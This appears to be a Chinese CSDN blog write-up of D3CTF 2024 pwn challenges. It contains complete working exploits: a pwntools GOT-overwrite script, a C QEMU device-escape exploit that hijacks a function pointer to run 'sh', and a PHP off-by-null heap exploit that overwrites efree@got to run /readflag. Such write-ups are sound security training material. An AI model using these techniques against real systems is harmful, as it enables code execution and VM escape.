D3CTF2024

于 2024-05-04 14:19:40 发布
阅读量851 收藏 13
点赞数 22
分类专栏: # 每日一“胖“ 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/138439369
版权

文章目录

前言

本次比赛笔者就做出两道简单题,但队里师傅太快了,所以也没我啥事。然后 WebPwn 那题命令行通了,但是浏览器不会调试,然后就简单记录一下。

note

  • 只开了 NX 和 Canary,所以可以打 got 表
  • 数组越界,可上溢、可下溢
  • 泄漏 libc_base,然后打 free@got 即可

关键数据结构如下:
在这里插入图片描述
exp 如下:

from pwn import *
context(arch = 'amd64', os = 'linux')
#context(arch = 'i386', os = 'linux')
#context.log_level = 'debug'

io = process("./pwn")
elf = ELF("./pwn")
libc = elf.libc

def debug():
    gdb.attach(io)
    pause()

sd     = lambda s    : io.send(s)
sda    = lambda s, n : io.sendafter(s, n)
sl     = lambda s    : io.sendline(s)
sla    = lambda s, n : io.sendlineafter(s, n)
rc     = lambda n    : io.recv(n)
rl     = lambda      : io.recvline()
rut    = lambda s    : io.recvuntil(s, drop=True)
ruf    = lambda s    : io.recvuntil(s, drop=False)
addr4  = lambda n    : u32(io.recv(n, timeout=1).ljust(4, b'\x00'))
addr8  = lambda n    : u64(io.recv(n, timeout=1).ljust(8, b'\x00'))
addr32 = lambda s    : u32(io.recvuntil(s, drop=True, timeout=1).ljust(4, b'\x00'))
addr64 = lambda s    : u64(io.recvuntil(s, drop=True, timeout=1).ljust(8, b'\x00'))
byte   = lambda n    : str(n).encode()
info   = lambda s, n : print("\033[31m["+s+" -> "+str(hex(n))+"]\033[0m")
sh     = lambda      : io.interactive()
menu   = b''

def add(idx, size, data):
    sl(byte(276))
    sleep(0.5)
    sl(byte(idx))
    sleep(0.5)
    sl(byte(size))
    sleep(0.5)
    sl(data)
    sleep(1)

def show(idx):
    sl(byte(1300))
    sleep(0.5)
    sl(byte(idx))

def free(idx):
    sl(byte(6425))
    sleep(0.5)
    sl(byte(idx))
    sleep(1)

def edit(idx, data):
    sl(byte(2064))
    sleep(0.5)
    sl(byte(idx))
    sleep(0.5)
    sl(data)

#gdb.attach(io, "b *0x401422")

add(1, 0x10, b'/bin/sh\x00')
show(-1460)
libc_base = addr8(6) - 0x1d46a0
info("libc_base", libc_base)

pay = p64(libc_base+0x1d46a0) + p64(0)*3 + p64(8) + p64(0x404000)
edit(-1460, pay)

edit(0, p64(libc_base+libc.sym.system))
free(1)

#pause()
#debug()
sh()

write_flag_where【复现】

题目给了源码,程序会先输出 libc_base 地址,然后循环往 libc 代码段写入 flag,这里 flag 的长度是已知的,并且知道其格式为 d3ctf{[a-f0-9]*},所以这里往 libc 代码段写入的值就是 [a-f0-9],由于其是未知的,所以这里得进行爆破

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>

#define FLAG_PREFIX "d3ctf{"
#define FLAG_PREFIX_LENGTH (sizeof(FLAG_PREFIX)-1)
#define FLAG_SUFFIX "}"
#define FLAG_SUFFIX_LENGTH (sizeof(FLAG_SUFFIX)-1)
#define LIBC_NAME "libc"

char maps[0x1000], flag[0x100];
uint64_t libc_code_addr_start, libc_code_addr_end;

void write_mem(uint64_t addr, uint8_t byte) {
  int fd = open("/proc/self/mem", O_RDWR);
  lseek(fd, addr, SEEK_SET);
  write(fd, &byte, 1);
  close(fd);
}

void init() {
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  FILE* maps_stream = fopen("/proc/self/maps", "r");

  int count = 1;
  char *line = NULL;
  uint64_t len = 0;
  uint64_t addr_start = 0, addr_end = 0, offset = 0, major_id = 0, minor_id = 0, inode_id = 0;
  char mode[0x10], file_path[0x100];
  memset(mode, 0, sizeof(mode));
  memset(file_path, 0, sizeof(file_path));

  while (getline(&line, &len, maps_stream) != -1 ) {
    sscanf(line,"%lx-%lx%s%lx%lu:%lu%lu%s",
      &addr_start, &addr_end, mode, &offset,
      &major_id, &minor_id, &inode_id, file_path
    );
    if (count == 10) {
      libc_code_addr_start = addr_start;
      libc_code_addr_end = addr_end;
      break;
    }
    count++;
  }

  if (line) {
    printf("%s", line);
    free(line);
  }
  fclose(maps_stream);

  int fd = open("/flag", O_RDONLY);
  read(fd, flag, 0x100);
  close(fd);
}

int main(int argc, char *argv[]) {
  init();

  uint64_t addr = 0;
  uint offset = 0;

  printf("flag: "FLAG_PREFIX"[a-f0-9]{%lu}"FLAG_SUFFIX"\n", strlen(flag) - FLAG_PREFIX_LENGTH - FLAG_SUFFIX_LENGTH);

  while (scanf("%lu%u", &addr, &offset) == 2) {
    if (!(libc_code_addr_start <= addr && addr < libc_code_addr_end) ||
        !(offset >= FLAG_PREFIX_LENGTH && offset < strlen(flag) - FLAG_SUFFIX_LENGTH))
      break;

    write_mem(addr, flag[offset]);
  }

  return 0;
}

这里主要参考星盟的 wp,具体后面再看看吧(:脑袋有点晕

D3BabyEscape

简单的 qemu 逃逸,题目维护的结构体如下:
在这里插入图片描述
其中 content 数组存在越界读写,从而导致可以读写 func 域,func 初始被设置为 rand_r 库函数,所以可以先利用越界读泄漏 libc_base,然后利用越界写修改 func 为 system 地址。而在 l0dev_mmio_write 函数中会调用 func 函数:
在这里插入图片描述
这里似乎只能传入 4 字节,所以传入 sh 即可完成逃逸,exp 如下:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/io.h>

void *mmio_mem;

void mmio_write64(size_t offset, uint64_t value) {
    *(uint64_t *) (mmio_mem + offset) = value;
}

uint64_t mmio_read64(size_t offset) {
    return *(uint64_t *) (mmio_mem + offset);
}

void mmio_init() {
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
    mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    mlock(mmio_mem, 0x1000);
}


uint32_t pmio_mem;

void pmio_write(uint32_t offset, uint32_t value) {
    outl(value, pmio_mem + offset);
}

uint32_t pmio_read(uint32_t offset) {
    return inl(pmio_mem + offset);
}

void pmio_init() {
    iopl(3);
    FILE *pmio_fd = fopen("/sys/devices/pci0000:00/0000:00:04.0/resource", "r");
    fscanf(pmio_fd, "%*p%*p%*p%p", &pmio_mem);
}

int main() {
	mmio_init();
	pmio_init();

	mmio_write64(128, 28);
	long long libc_base = mmio_read64(31*8) - 0x46780;
	long long system = libc_base + 0x50D70;
	printf("libc_base: %#llx\n", libc_base);
	
	mmio_write64(0, 666);
	pmio_read(0);
	
	pmio_write(31*8, system&0xffffffff);
	pmio_write(31*8+4, (system>>32)&0xffffffff);
	//char cmd[16] = "/bin/sh\x00";
	char cmd[16] = "sh\x00";
	mmio_write64(64, *(long long*)cmd);
	return 0;
}

PwnShell

phpPwn,一个 off by null 漏洞,然后命令行启动打通了,浏览器不想调了,就这样吧。题目维护的结构体如下:
在这里插入图片描述
这里利用 off by null 去进行堆重叠,使得一个 data chunk 和一个 control chunk 重合,这样就可以实现任意地址读写了,泄漏 libc_base 然后覆写 efree@got 即可。这里泄漏 libc 可以直接包含 /proc/self/maps 泄漏,所以关键就是覆写 efree@got 罢了(:

然后打远程是要通过 Apache 的,然而在比赛时,我一直在命令行上调,最后远程一直打不了,给我搞崩溃了(:其实本地通过 Apache 也打不了,最开始调试方向就错了

贴个本地命令行 exp:

<?php
        function tobytes($integerValue, $byteLength) {
                $byteString = '';
                for ($i = 0; $i < $byteLength; $i++) {
                        $byteString .= pack('C',$integerValue & 0xFF);
                        $integerValue >>= 8;
                }
                return $byteString;
        }

        function get_addr($sss, $llen) {
                $decimalValue = 0;
                for ($i = 1; $i <= $llen; $i++) {
                    $char = $sss[-$i];
                    $digit = ord($char);
                    $decimalValue = ($decimalValue << 8) | $digit;
                }
                return $decimalValue;
        }

        $libc = "";
        $stack = "";
        function callback($buffer){
                global $libc,$stack;
                $p1 = '/([0-9a-f]+)\-[0-9a-f]+ .* \/usr\/lib\/x86_64-linux-gnu\/libc.so.6/';
                $p = '/([0-9a-f]+)\-[0-9a-f]+ .*  \[stack\]/';
                preg_match_all($p, $buffer, $stack);
                preg_match_all($p1, $buffer, $libc);
                return "";
        }

        ob_start("callback");
        $a="/proc/self/maps";
        include($a);
        $buffer=ob_get_contents();
        ob_end_flush();
        callback($buffer);
        $stack = hexdec($stack[1][0]);
        $libc_base = hexdec($libc[1][0]);

        echo dechex($stack);
        echo "\n";
        echo dechex($libc_base);
        echo "\n";

	
        addHacker("BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
        addHacker("BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
        addHacker("BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
        addHacker("BBBBBBBBBBBBBBBB", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
        addHacker("BBBBBBBBBBBBBBBB", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");

        editHacker(2, "\x00\x00\x00\x00\x00\x00\x00\x00");
        addHacker("BBBBBBBBBBBBBBBB", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
        addHacker("BBBBBBBBBBBBBBBB", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
	

        $efree = $libc_base - 0x2cf1fc0-8;
        $system = $libc_base + 0x4c490;

        echo "PWN\n";
       
		editHacker(2, tobytes($efree, 6));
		editHacker(5, tobytes($system, 8));

        addHacker("/readflag\x00", "/readflag\x00");
        removeHacker(7);
	
?>
XiaozaYa
关注
专栏目录
2022d3CTF 部分web题基础知识学习
weixin_51458899的博客
03-23 4051
[d3ctf2020]shorter rome1.0反序列化链调试见上面(第三周标题为[d3ctf2020]的内容) 当时参考的资料: ROME反序列化分析 (c014.cn) javassist使用全解析 - rickiyang - 博客园 (cnblogs.com) https://xz.aliyun.com/t/6787#toc-8 (java反射入门) https://developer.huawei.com/consumer/cn/forum/topic/020447303398723010
d3ctf 2022 re复现
个人博客:http://s0rry.cn
03-31 1136
接触到很多新东西,平时刷题几乎遇不到
D3CTF 2022 d3fuse
weixin_46483787的博客
03-12 454
首先来了解一下什么是fuse 简而言之就是一个二进制文件,但是运行起来之后实现了一个文件系统的功能。 然后我们看题目给的二进制文件: main_real函数的参数ida没有很好的翻译出来,我们看一下源码: 可以看到第三个参数是operation,这里直接放重命名好的: 到这里我们大概摸清了程序功能,其实就是通过这样一个函数表,起了一个用户态文件系统,在文件系统中对文件的各项操作都是由这些函数来实现的。 需要在这些函数中找漏洞 来看rename函数: 这个函数可以和mv file1 file2这个指
D^3CTF2022 Crypto 复现
qq_41626232的博客
04-26 574
没什么师傅出后面题的wp什么的,题目质量确实高。
D3CTF2021-non-RCE
feng的博客
03-07 4083
non-RCE 前言 去年D3CTF的题目,最近刚复现完国赛的那道Java,感觉出题的思路也是魔改的这题,所以来复现一下这题。 password绕过 不谈代码了,因为审完之后思路还是比较清晰的,就是利用JDBC对AsjpectJWeaver反序列化写文件到classpath然后反序列化rce。 第一重过滤是这个: public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterCha
D3CTF2022-官方WriteUp1
08-03
D3CTF2022-官方WriteUp1
d3ctf_easyQuantum
03-13
easyQuantum cap.pcapng用Wireshark打开,清晰可见的TCP的三次握手和四次挥手: 因此需要仔细分析中间的数据传输过程。 注意到某些数据包内有“ numpy”等字符串: 于是想到可能是某种兼容Python的序列化方法。...
D3CTF2021-d3dev
最新发布
11-05
附件
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
CTF题库超详细资源合集
06-14
ctf题库 CTF 题⽬类型⼀般分为 Web 渗透、RE 逆向、Misc 杂项、PWN ⼆进制漏洞利⽤、Crypto 密码破译。 在传统的CTF线上⽐赛中,Web类题⽬是主要的题型之⼀,相较于⼆进制、逆向等类型的题⽬,参赛者不需掌握系统...
2019 D^3CTF new_heap详细题解
seaaseesa的博客
11-28 1446
new_heap(高质量题) 这题是2019 d3ctf赛的一题,当时没做出来,后来看了大佬的exp脚本,慢慢研究,终于明白了原理,现在,我们就来详细的解析一下这题 首先,我们还是检查一下程序的保护机制,保护全开 再看一下给我们的libc.so.6的版本,可见是glibc2.29,那么对于堆的管理,就存在tcache机制 程序只有简单的3个功能,没有show,也没有edit,这让我...
2019 D3CTF ezupload题解
读万卷书,行万里路。
08-15 1225
0 前言 一个 PHP 反序列化的题目。虽然序列化的的利用链简单,但是还是踩了很多坑。 1 题解 序列化脚本:serialize.php <?php class dir{ public $userdir; public $url; public $filename; } $o = new dir(); $tmp = new dir(); $tmp->userdir = $argv[1]; // 需要扫描的目录 $o->userdir = $tmp; $o-
D^3CTF(Crypto-D3bug详解 LFSR题目)
MangoFengC++
03-15 1068
D3bug详解(LFSR题目) Author: MangoFeng 题目 from Crypto.Util.number import * from secret import flag assert flag.startswith("D3CTF{") assert flag.endswith("}") message = bytes_to_long(flag[6:-1]) assert message < 2**64 mask = 0b10100100000010000000100010010100
2019 D^3CTF unprintableV详细题解
seaaseesa的博客
11-30 1512
unprintableV 这是2019 d3ctf的一道pwn题,由于当时知识储备不够没做出来,赛后就好好研究,从中学到了新的知识 本题用到的知识有:ROP、stdout指针与stderr指针、栈迁移、格式化字符串漏洞 首先,我们检查一下程序的保护机制 除了canary,其它的保护都开了 然后,我们用IDA分析一下 这个沙箱函数,把execve函数给禁用了,所以,我们不能getsh...
2021 AntCTF&D3CTF之jumpjump
qq_43682582的博客
03-08 407
AntCTF&D3CTF之jumpjump前言正题后记 前言 其他的都太难惹。。。 正题 Ida打开,shift+F12查看字符串: 跟进后来到关键函数,F5大法查看伪代码: 通过分析,有两个关键函数,sub_40189D()和sub_40191E(),第一个函数: 继续跟进: for循环里的就是第一轮异或,后面的sub_408A80()函数经过动态调试发现为反调试手段, 只要不进入该函数,直接F9到下一个断点前即可继续运行程序。 第二个函数: 将第一轮异或后的值加4之后与0x33异或,再与
2019 D^3CTF_wp:fakeonlinephp解法(类实网渗透)
Smity的博客
11-26 3454
D3ctf fake_online_php 题解 外网渗透部分 smb协议利用导致远程文件包含 http://35547429ed.fakeonelinephp.d3ctf.io/?orange=\**********\share\test5&a=…\nc2.exe±e+cmd+39.105.136.196+30023 内网渗透部分 再写一个马子 进入远程桌面 ...
d3ctf_2019_ezfile(文件流fileno的巧妙利用)
seaaseesa的博客
06-11 1017
d3ctf_2019_ezfile(文件流fileno的巧妙利用) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,delete功能存在UAF 程序里使用的是write输出,因此劫持IO_2_1_stdout泄露不了数据。 Add功能的size固定 Encrypt功能存在栈溢出 程序一开头有一个这个 我们可以利用堆漏洞劫持IO_2_1_stdin,将里面的fileno改为3,然后利用encrypt功能里的栈溢出,采用低字节覆盖法,将返回地址覆盖到此处 .
D3CTF 8-bit解题详解
lllffg的博客
03-08 1061
8-bit pub (在模板注入的路上莽了一整天,然后发现不是模板注入23333333) 尝试SQL注入,猜测后台sql语句 select * from user where username='xxx' and password='xxx'; 一系列操作后没有结果 源码中调用了这个模块 node.js中 express-session的安装使用及session的持久化 express-session中的resave和saveUninitialized express+session实现简易身份认证 然
ctf不允许上传该类型php,d3ctf easyweb题解
weixin_42474164的博客
04-01 455
前言这道题思路其实就是,如果在php中遇到了模版注入,但是限制了不允许执行php代码的时候,怎么通过模版注入达到RCE的效果考点预期:二次注入模版注入phar反序列化CI RCE POP链挖掘非预期:二次注入模版注入SSTI沙箱逃逸二次注入image.png可以看到,在get_view的时候,通过session中的userid从数据库中取出了用户的username,之后对username进行了两次...
[D3CTF 2019]EasyWeb
07-28
回答: \[1\]根据引用\[1\]中的描述,当将Smarty嵌入到CI框架中时,可能使用的是一个兼容低版本Smarty的引擎,而不是最新的Smarty引擎。这可能是因为参考的文章比较旧,导致整合时选择了兼容低版本的引擎。 \[2\]引用\[2\]中提到,CI框架的类是按需加载的,而不是自动加载的。这导致在全局搜索__destruct方法时可能会出现很多结果,但实际上无法使用。这可能是导致pop链不好找的一个重要原因。 \[3\]引用\[3\]中提到,在phpinfo中发现了一个flag,这表明还有另一种方法可以获取flag,即通过get_the_flag方法。然而,get_the_flag方法有两个过滤条件,一个是不允许出现"<?",另一个是对文件头字节进行过滤。作者提到可以传递一个文本文件,内容进行base64编码,并加上图片头字节,然后再传递一个.htaccess文件进行解码。 综上所述,\[D3CTF 2019\]EasyWeb可能涉及到使用兼容低版本的Smarty引擎、按需加载的类导致pop链难以找到,以及通过绕过过滤条件来获取flag的方法。 #### 引用[.reference_title] - *1* *2* [d3ctf easyweb题解](https://blog.csdn.net/weixin_42474164/article/details/116281650)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[SUCTF 2019]EasyWeb](https://blog.csdn.net/shinygod/article/details/124045024)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值